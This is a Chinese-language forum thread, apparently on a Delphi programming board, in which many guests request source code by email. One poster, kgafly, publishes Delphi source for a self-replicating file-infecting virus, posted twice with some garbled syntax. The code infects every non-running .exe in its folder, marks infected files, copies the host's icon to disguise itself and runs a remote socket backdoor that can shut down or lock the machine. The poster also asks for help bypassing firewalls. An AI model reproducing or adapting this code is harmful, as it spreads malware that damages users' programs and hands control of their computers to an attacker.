C
cx139
Unregistered / Unconfirmed
GUEST, unregistred user!
侃侃
cx2222@mail.china.com
cx2222@mail.china.com
X
xrday
Unregistered / Unconfirmed
GUEST, unregistred user!
是不是真的有呀,,
我想不出用delphi做的哪东西什么有多么的大?
哈,!
哪真的有哪给我看看:_
xrday@hotmail.com
thanks
我想不出用delphi做的哪东西什么有多么的大?
哈,!
哪真的有哪给我看看:_
xrday@hotmail.com
thanks
A
aefhh
Unregistered / Unconfirmed
GUEST, unregistred user!
想看看你的水平到底怎么样
aefh@263.net
aefh@263.net
B
bubble
Unregistered / Unconfirmed
GUEST, unregistred user!
Thanks
puzzledj@163.com
puzzledj@163.com
C
cqbaobao
Unregistered / Unconfirmed
GUEST, unregistred user!
有趣,
szchengyu@263.net
szchengyu@263.net
K
kim_fu
Unregistered / Unconfirmed
GUEST, unregistred user!
kim_fu@sohu.com
谢谢
谢谢
F
fanren945
Unregistered / Unconfirmed
GUEST, unregistred user!
powergameboy@sina.com
学习学习
学习学习
T
tomore
Unregistered / Unconfirmed
GUEST, unregistred user!
这里也有呀
http://www.playicq.com
http://www.playicq.com
L
liop
Unregistered / Unconfirmed
GUEST, unregistred user!
linxiaojun@263.net
谢谢
谢谢
L
lesser-panda
Unregistered / Unconfirmed
GUEST, unregistred user!
关注
lesser-panda@163.com
lesser-panda@163.com
C
CathyEagle
Unregistered / Unconfirmed
GUEST, unregistred user!
eagleboost@21cn.com
K
kgafly
Unregistered / Unconfirmed
GUEST, unregistred user!
要源代码的朋友太多了,所以我把主要的代码公布出来。本人水平有限,如果哪位还有更好的方法,希望
不要吝啬,也公布出来大家一起研究。因为我在网络方面的编程不熟,不知道如何绕过防火墙,
希望有这方面研究的高手赐教。fly0128@sina.com.cn
fAtom: TAtom;
sr: TSearchRec;
filehandle: Hinst;
Ficon: Ticon;
const
BakDExe = 'NMD.exe';
//要感染的exe备份
BakExe = 'c:/sos.dll';
//自己备份
TmpExe = 'TMD.exe';
//临时文件
SeparateExe = 'Separate.exe';
//复制的要进行分离的文件
implementation
{$R *.dfm}
function Enumresname(hmodule: Hmodule;
lptype, lpname: Pchar;
lparam: longint): Bool;
stdcall;
var
hicon1: hicon;
hresource: hrsrc;
hmem: hrsrc;
lpresource: pbyte;
begin
hresource := findresource(filehandle, lpname, RT_ICON);
hmem := loadresource(filehandle, hresource);
lpresource := lockresource(hmem);
hicon1 := Createiconfromresourceex(lpresource, sizeofresource(filehandle, hresource),
True, $0030000, 32, 32, LR_DEFAULTCOLOR);
try
Ficon := TIcon.Create;
Ficon.handle := hicon1;
Ficon.SaveToFile('****.ico');
finally
freeandnil(ficon);
end;
result := True;
end;
procedure TForm1.ServerSocket1ClientRead(Sender: TObject;
Socket: TCustomWinSocket);
var
GetOrder: string;
begin
GetOrder := Socket.ReceiveText;
if GetOrder = 'ExitWindows' then
//退出Windows
begin
ExitWindows(0, 0);
end;
//if
if GetOrder = 'LockWorkstation' then
//锁定工作站
begin
LockWorkStation;
end;
//if
if GetOrder = 'ShutDown' then
//关机
begin
InitiateSystemShutdown('127.0.0.1', '', 10000, TRUE, FALSE);
end;
//if
if GetOrder = 'AboutShutDown' then
//放弃关机
begin
AbortSystemShutdown('127.0.0.1');
end;
//if
if GetOrder = 'ExitWindows' then
begin
ExitWindows(0, 0);
end;
//if
end;
function InspectProcess(FileName: string): bool;
var
p: pProcessInfo;
// i: integer;
ContinueLoop: BOOL;
FSnapshotHandle: THandle;
FProcessEntry32: TProcessEntry32;
l: TList;
inFlag: boolean;
begin
inFlag := false;
l := TList.Create;
l.Clear;
//TH32CS_SNAPPROCESS
FSnapshotHandle := CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0);
FProcessEntry32.dwSize := Sizeof(FProcessEntry32);
ContinueLoop := Process32First(FSnapshotHandle, FProcessEntry32);
while integer(ContinueLoop) <> 0do
begin
New(p);
p.ExeFile := FProcessEntry32.szExeFile;
p.ProcessID := FProcessEntry32.th32ProcessID;
l.Add(p);
ContinueLoop := Process32Next(FSnapshotHandle, FProcessEntry32);
if FileName = p.ExeFile then
inFlag := true;
end;
Result := inFlag;
end;
procedure AddFlag(FileName: string);
var
f3: TFileStream;
Mysting: TStringStream;
begin
CopyFile(pchar(FileName), pchar('b.bak'), true);
filehandle := LoadLibrary(pchar('b.bak'));
Enumresourcenames(filehandle, RT_ICON, @enumresname, 1);
FreeLibrary(filehandle);
DeleteFile('b.bak');
try
f3 := TFileStream.Create(FileName, fmOpenWrite);
f3.Size := f3.Size + 18;
f3.Seek(0, soFromEnd);
Mysting := TStringStream.Create('FLY0128@sina.com.cn');
f3.CopyFrom(Mysting, 0);
f3.WriteBuffer(Mysting, sizeof(Mysting));
finally
Mysting.Free;
Freeandnil(f3);
end;
end;
function Flagin(FileName: string): bool;
function StrAisinStrB(A, B: string): bool;
var
m, n, i, ok, x, y: integer;
t1, t2: pchar;
begin
ok := 0;
x := 0;
y := 0;
t1 := pchar(A);
t2 := pchar(B);
m := length(string(t2));
n := length(string(t1));
for i := mdo
wnto 0do
if t2[x] = t1[y] then
begin
inc(x);
inc
;
inc(ok);
if ok = n then
break;
end else
begin
ok := 0;
inc(x);
end;
if ok = n then
result := True
else
result := False;
end;
var
f3: TFileStream;
pData: array[0..18] of char;
tmsstr: string;
begin
f3 := TFileStream.Create(FileName, fmOpenRead);
f3.Seek(-25, soFromEnd);
f3.ReadBuffer(pData, sizeof(pData));
freeandnil(f3);
tmsstr := pData;
if StrAisinStrB('FLY', tmsstr) then
//'FLY'是标志
Result := True
else
Result := False;
end;
procedure InfectFile(FileName: string);
var
f1, f2, f3: TFileStream;
s1, s2, s3: integer;
begin
try
f1 := TFileStream.Create(BakExe, fmOpenRead or fmShareExclusive);
s1 := f1.Size;
f2 := TFileStream.Create(FileName, fmOpenRead or fmShareExclusive);
s2 := f2.Size;
f3 := TFileStream.Create(TmpExe, fmCreate or fmShareExclusive);
f3.Seek(0, soFromEnd);
//往尾部添加资源
f3.CopyFrom(f1, 0);
s3 := s1 + Sizeof(f3);
//计算资源大小,并写入辅程尾部
f3.WriteBuffer(s3, sizeof(s3));
f3.Seek(0, soFromEnd);
//往尾部添加资源
f3.CopyFrom(f2, 0);
s3 := s2 + Sizeof(f3);
//计算资源大小,并写入辅程尾部
f3.WriteBuffer(s3, sizeof(s3));
finally
Freeandnil(f1);
Freeandnil(f2);
Freeandnil(f3);
DeleteFile(FileName);
end;
end;
procedure ChangeIcon(FileName: string);
var
NewIcon: TMemoryStream;
FileToMod: TFileStream;
begin
try
NewIcon := TMemoryStream.Create;
NewIcon.LoadFromFile('****.ico');
NewIcon.Position := 126;
FileToMod := TFileStream.Create(TmpExe, fmOpenReadWrite);
FileToMod.Seek(405120, 0);
//400900图标位置
FileToMod.CopyFrom(NewIcon, 511);
FileToMod.WriteBuffer(NewIcon, sizeof(NewIcon));
finally
freeandnil(FileToMod);
freeandnil(NewIcon);
end;
end;
procedure SeparateSelf;
var
s2: integer;
Source: TFileStream;
Target: TMemoryStream;
begin
//分离自己,生成文件
CopyFile(pchar(Application.exename), SeparateExe, false);
s2 := 441344;
//病毒自身长度
Target := TMemoryStream.Create;
Source := TFileStream.Create(SeparateExe, fmOpenRead or fmShareDenyNone);
try
Source.Seek(-sizeof(s2), soFromEnd);
Source.ReadBuffer(s2, sizeof(s2));
//读出资源大小
Source.Seek(-s2, soFromEnd);
//定位到资源位置
Target.CopyFrom(Source, s2 - sizeof(s2));
//取出资源
Target.SaveToFile('run.exe');
//存放到文件
finally
Target.Free;
Source.Free;
end;
DeleteFile(SeparateExe);
winexec(pchar('run.exe'), SW_MAXIMIZE);
//
end;
procedure TForm1.FormCreate(Sender: TObject);
begin
{
if GlobalFindAtom('**** U') = 0 then
begin
fAtom := GlobalAddAtom('**** U');
end else
Application.Terminate;
}
if ExtractFileName(Application.ExeName) <> 'Server.exe' then
begin
SeparateSelf;
end else
begin
CopyFile(pchar(Application.exename), BakExe, false);
end;
if FindFirst('*.exe', faAnyFile, sr) = 0 then
begin
repeat
if (sr.Name <> 'run.exe') then
if (sr.Name <> 'WinMon.exe') then
if not InspectProcess(sr.Name) then
//判断exe是否在进程中
if not Flagin(sr.Name) then
//文件未感染
begin
AddFlag(sr.Name);
//写入标志
InfectFile(sr.Name);
//感染文件
ChangeIcon(sr.Name);
//最后firegun
RenameFile(TmpExe, sr.Name);
end;
until
FindNext(sr) <> 0;
FindClose(sr);
end;
//if
ServerSocket1.Active := true;
end;
公布的主要是程序自我复制的功能。
不要吝啬,也公布出来大家一起研究。因为我在网络方面的编程不熟,不知道如何绕过防火墙,
希望有这方面研究的高手赐教。fly0128@sina.com.cn
fAtom: TAtom;
sr: TSearchRec;
filehandle: Hinst;
Ficon: Ticon;
const
BakDExe = 'NMD.exe';
//要感染的exe备份
BakExe = 'c:/sos.dll';
//自己备份
TmpExe = 'TMD.exe';
//临时文件
SeparateExe = 'Separate.exe';
//复制的要进行分离的文件
implementation
{$R *.dfm}
function Enumresname(hmodule: Hmodule;
lptype, lpname: Pchar;
lparam: longint): Bool;
stdcall;
var
hicon1: hicon;
hresource: hrsrc;
hmem: hrsrc;
lpresource: pbyte;
begin
hresource := findresource(filehandle, lpname, RT_ICON);
hmem := loadresource(filehandle, hresource);
lpresource := lockresource(hmem);
hicon1 := Createiconfromresourceex(lpresource, sizeofresource(filehandle, hresource),
True, $0030000, 32, 32, LR_DEFAULTCOLOR);
try
Ficon := TIcon.Create;
Ficon.handle := hicon1;
Ficon.SaveToFile('****.ico');
finally
freeandnil(ficon);
end;
result := True;
end;
procedure TForm1.ServerSocket1ClientRead(Sender: TObject;
Socket: TCustomWinSocket);
var
GetOrder: string;
begin
GetOrder := Socket.ReceiveText;
if GetOrder = 'ExitWindows' then
//退出Windows
begin
ExitWindows(0, 0);
end;
//if
if GetOrder = 'LockWorkstation' then
//锁定工作站
begin
LockWorkStation;
end;
//if
if GetOrder = 'ShutDown' then
//关机
begin
InitiateSystemShutdown('127.0.0.1', '', 10000, TRUE, FALSE);
end;
//if
if GetOrder = 'AboutShutDown' then
//放弃关机
begin
AbortSystemShutdown('127.0.0.1');
end;
//if
if GetOrder = 'ExitWindows' then
begin
ExitWindows(0, 0);
end;
//if
end;
function InspectProcess(FileName: string): bool;
var
p: pProcessInfo;
// i: integer;
ContinueLoop: BOOL;
FSnapshotHandle: THandle;
FProcessEntry32: TProcessEntry32;
l: TList;
inFlag: boolean;
begin
inFlag := false;
l := TList.Create;
l.Clear;
//TH32CS_SNAPPROCESS
FSnapshotHandle := CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0);
FProcessEntry32.dwSize := Sizeof(FProcessEntry32);
ContinueLoop := Process32First(FSnapshotHandle, FProcessEntry32);
while integer(ContinueLoop) <> 0do
begin
New(p);
p.ExeFile := FProcessEntry32.szExeFile;
p.ProcessID := FProcessEntry32.th32ProcessID;
l.Add(p);
ContinueLoop := Process32Next(FSnapshotHandle, FProcessEntry32);
if FileName = p.ExeFile then
inFlag := true;
end;
Result := inFlag;
end;
procedure AddFlag(FileName: string);
var
f3: TFileStream;
Mysting: TStringStream;
begin
CopyFile(pchar(FileName), pchar('b.bak'), true);
filehandle := LoadLibrary(pchar('b.bak'));
Enumresourcenames(filehandle, RT_ICON, @enumresname, 1);
FreeLibrary(filehandle);
DeleteFile('b.bak');
try
f3 := TFileStream.Create(FileName, fmOpenWrite);
f3.Size := f3.Size + 18;
f3.Seek(0, soFromEnd);
Mysting := TStringStream.Create('FLY0128@sina.com.cn');
f3.CopyFrom(Mysting, 0);
f3.WriteBuffer(Mysting, sizeof(Mysting));
finally
Mysting.Free;
Freeandnil(f3);
end;
end;
function Flagin(FileName: string): bool;
function StrAisinStrB(A, B: string): bool;
var
m, n, i, ok, x, y: integer;
t1, t2: pchar;
begin
ok := 0;
x := 0;
y := 0;
t1 := pchar(A);
t2 := pchar(B);
m := length(string(t2));
n := length(string(t1));
for i := mdo
wnto 0do
if t2[x] = t1[y] then
begin
inc(x);
inc
;inc(ok);
if ok = n then
break;
end else
begin
ok := 0;
inc(x);
end;
if ok = n then
result := True
else
result := False;
end;
var
f3: TFileStream;
pData: array[0..18] of char;
tmsstr: string;
begin
f3 := TFileStream.Create(FileName, fmOpenRead);
f3.Seek(-25, soFromEnd);
f3.ReadBuffer(pData, sizeof(pData));
freeandnil(f3);
tmsstr := pData;
if StrAisinStrB('FLY', tmsstr) then
//'FLY'是标志
Result := True
else
Result := False;
end;
procedure InfectFile(FileName: string);
var
f1, f2, f3: TFileStream;
s1, s2, s3: integer;
begin
try
f1 := TFileStream.Create(BakExe, fmOpenRead or fmShareExclusive);
s1 := f1.Size;
f2 := TFileStream.Create(FileName, fmOpenRead or fmShareExclusive);
s2 := f2.Size;
f3 := TFileStream.Create(TmpExe, fmCreate or fmShareExclusive);
f3.Seek(0, soFromEnd);
//往尾部添加资源
f3.CopyFrom(f1, 0);
s3 := s1 + Sizeof(f3);
//计算资源大小,并写入辅程尾部
f3.WriteBuffer(s3, sizeof(s3));
f3.Seek(0, soFromEnd);
//往尾部添加资源
f3.CopyFrom(f2, 0);
s3 := s2 + Sizeof(f3);
//计算资源大小,并写入辅程尾部
f3.WriteBuffer(s3, sizeof(s3));
finally
Freeandnil(f1);
Freeandnil(f2);
Freeandnil(f3);
DeleteFile(FileName);
end;
end;
procedure ChangeIcon(FileName: string);
var
NewIcon: TMemoryStream;
FileToMod: TFileStream;
begin
try
NewIcon := TMemoryStream.Create;
NewIcon.LoadFromFile('****.ico');
NewIcon.Position := 126;
FileToMod := TFileStream.Create(TmpExe, fmOpenReadWrite);
FileToMod.Seek(405120, 0);
//400900图标位置
FileToMod.CopyFrom(NewIcon, 511);
FileToMod.WriteBuffer(NewIcon, sizeof(NewIcon));
finally
freeandnil(FileToMod);
freeandnil(NewIcon);
end;
end;
procedure SeparateSelf;
var
s2: integer;
Source: TFileStream;
Target: TMemoryStream;
begin
//分离自己,生成文件
CopyFile(pchar(Application.exename), SeparateExe, false);
s2 := 441344;
//病毒自身长度
Target := TMemoryStream.Create;
Source := TFileStream.Create(SeparateExe, fmOpenRead or fmShareDenyNone);
try
Source.Seek(-sizeof(s2), soFromEnd);
Source.ReadBuffer(s2, sizeof(s2));
//读出资源大小
Source.Seek(-s2, soFromEnd);
//定位到资源位置
Target.CopyFrom(Source, s2 - sizeof(s2));
//取出资源
Target.SaveToFile('run.exe');
//存放到文件
finally
Target.Free;
Source.Free;
end;
DeleteFile(SeparateExe);
winexec(pchar('run.exe'), SW_MAXIMIZE);
//
end;
procedure TForm1.FormCreate(Sender: TObject);
begin
{
if GlobalFindAtom('**** U') = 0 then
begin
fAtom := GlobalAddAtom('**** U');
end else
Application.Terminate;
}
if ExtractFileName(Application.ExeName) <> 'Server.exe' then
begin
SeparateSelf;
end else
begin
CopyFile(pchar(Application.exename), BakExe, false);
end;
if FindFirst('*.exe', faAnyFile, sr) = 0 then
begin
repeat
if (sr.Name <> 'run.exe') then
if (sr.Name <> 'WinMon.exe') then
if not InspectProcess(sr.Name) then
//判断exe是否在进程中
if not Flagin(sr.Name) then
//文件未感染
begin
AddFlag(sr.Name);
//写入标志
InfectFile(sr.Name);
//感染文件
ChangeIcon(sr.Name);
//最后firegun
RenameFile(TmpExe, sr.Name);
end;
until
FindNext(sr) <> 0;
FindClose(sr);
end;
//if
ServerSocket1.Active := true;
end;
公布的主要是程序自我复制的功能。
C
chy578
Unregistered / Unconfirmed
GUEST, unregistred user!
你可真够狠的,源码发给我吧,我有个空间,我放上去大家就都有了。。
E : 6b6@21cn.com
E : 6b6@21cn.com
J
jomee
Unregistered / Unconfirmed
GUEST, unregistred user!
anan168@163.com
学习。
学习。
人
人云
Unregistered / Unconfirmed
GUEST, unregistred user!
liuyay@163.net
学习
学习
H
heavenluohao
Unregistered / Unconfirmed
GUEST, unregistred user!
very good ,I want it!
freecat@0451.com
freecat@0451.com
酷
酷尔贝塔
Unregistered / Unconfirmed
GUEST, unregistred user!
收藏研究
酷
酷尔贝塔
Unregistered / Unconfirmed
GUEST, unregistred user!
不错,收藏
老
老人家
Unregistered / Unconfirmed
GUEST, unregistred user!
liuyj_74@163.com
